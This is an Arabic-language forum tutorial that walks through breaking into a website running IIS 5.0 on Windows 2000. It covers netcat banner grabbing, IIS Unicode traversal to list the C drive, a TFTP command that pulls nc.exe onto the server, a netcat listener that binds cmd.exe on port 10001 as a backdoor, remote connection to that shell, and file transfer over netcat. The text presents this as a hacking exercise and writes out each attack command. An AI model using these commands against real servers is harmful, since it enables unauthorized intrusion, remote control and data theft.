الاتصال بلبورت

مثلا عندنا موقع ونبغي نطلع معلومات عنه , مثل المعلومات الي يعطينا اياها موقع
بكل بساطه , نكتب الامر هذا : nc –v –n 192.168.1.90 80

الاتصال بلبورت 1022figure3

الحين طلعنا معلومات عن البورت 21 و 80 , ولطع لنا ان الموقع شغال على ويندوز 2000 وعلى سيرفر IIS5.0 .و فيه ميكورسوفت FTP

حلو هذي معلومات بتفيدنا في تحديد الهدف للاختراق .

الحين بنشتغل شغل اجمد , وبنبدا فالتطبيق العملي , بنخترق الموقع .
بنخلي النت كات يفتح لنا باك دور فالموقع . طبعن لازم نحمل النت كات على الموقع اول شي علشان يفتح لنا الباك دور . كيف ؟؟
بما ان الموقع على سيرفر IIS5.0 , بنستخدم سكربتات اليونيكود الخطيره في رفعه

الاتصال بلبورت 1022figure4

مثل ما تشوفون استخدمنا السكر [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
لاستعراض محتويات الدرايف C , عن طريق المجلد ******s

وطلعت لنا النتائج : ********s and Settings , Inetpub , Program Files , WINNT
حلو , الحين بنرفع النت كات على سيرفر IIS
بنستخدم ال tftp , هذي الاداه مشابهه للاف تي بي , اكتب في الدوس tftp , اذا تبغي تعرف المزيد عنها .
نرجع الى موضوعنا :

الاتصال بلبورت 1022figure5

شوفو الاسكربت الي حطيناه هذي المره , نفس السكربت الاولي , لكن بدل امر
الاستعراض dir , حطينا امر tftp , وطبقناه , هذي هي طريقه : TFTP [-i] host
[GET | PUT] source [destination]
نحن في اختراقنا هذا الي سويناه : tftp –I 192.168.1.90 get nc.exe
طبعن في اسكربتات اليونيكود بدل المسافه نكتب +
فتصير بهذا الشكل

في برنامج رائع اسمه TFTPD32 , يطلع لك اذا النت كات انرفع بنجاح للسيرفر

موقع البرنامج [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
الاتصال بلبورت 1022figure6

الحين بنبدا فالشغل الحلو , بعد ما رفعنا النت كات وكل شي تمام , نبغي نخلي النت كات يفتح لنا باك دور (Back Door) .
علشان نخليه يفتح لنا الباك دور لازم نخليه فالاول يتنصت على بورت فالسيرفر
, مثلا اخترت البورت 10001 , بعدين بنقدر نتصل بالبورت من جهازنا بستخدام
النت كات

انزين الحين بنطبق امر التنصت من السيرفر , هذا هو الامر : nc -L -p 10001 -d -e cmd.exe

نشرح شوية الاوامر هذي الي كتبناها :
Nc : يخلي الويندوز يشغل النت كات nc.exe
-L : يخبر النت كات بان لا يغلق وان ينتظر الانتصال
-p : لتحديد البورت الي بنتصنت عليه .
-d : يخبر النت كات بالتصال بالبرنامج الي نريد ان نشغله
-e : يخبر النت كات بالبرنامج الي نريده ان يشتغل بعد الاتصال بالبورت .
طبعن نحن اخترنا الدوس cmd.exe

الحين بنكتب الامر في سكربت اليونيكود , طبعن بيكون بهذا الشكل

شوفو الصوره

الاتصال بلبورت 1022figure7

الحين تمام , النت كات تنصت على البورت 10001 , وفتح لنا باك دور على الدوس cmd.exe

الحين يا دورنا , علشان نتصل من جهازنا على النت كات الي على السيرفر

الاتصال بلبورت 1022figure8

الحين مثل ما ملاحظين , بعد ما اتصلنا بالبورت المتنصتين عليه 10001 ,
بالامر nc –v –n 192.168.1.90 10001

دخلنا على ملف ******s الي فالسيرفر , وطبقنا الامر ipconfig , والنتيجه انه طلع لنا ايبي السيرفر (^_^)
الحين تمام صار عندنا تحكم بعيد على السيرفر .

الحين نبغي ننقل الملفات بواسطة النت كات , كيف ؟؟
نقدر عن طريق ال TFTP , لكن لازم نسويها مره ثانيه عن طريق اليونيكود , لكن
ليش نحن خلاص تعاملنا الحين مع النت كات وهو افضل وعندنا اتصال خارجي معاه
.

اول شي امر استقبال او سحب ملف من السيرفر , مثلا اذا كان فالسيرفر ملف
اسمه hack.txt , ونبغي نسحبه , بنطبق هذا الامر : nc –l –p 1234
>hack.txt
1234 هذا هو البورت الي بنستخدمه في سحب الملف

الاتصال بلبورت 1022figure9

انزين , واذا حبينا انا نرفع ملف للسيرفر , كيف ؟؟
عن طريق هذا الامر : nc 192.168.1.90 1234
الاتصال بلبورت 1022figure10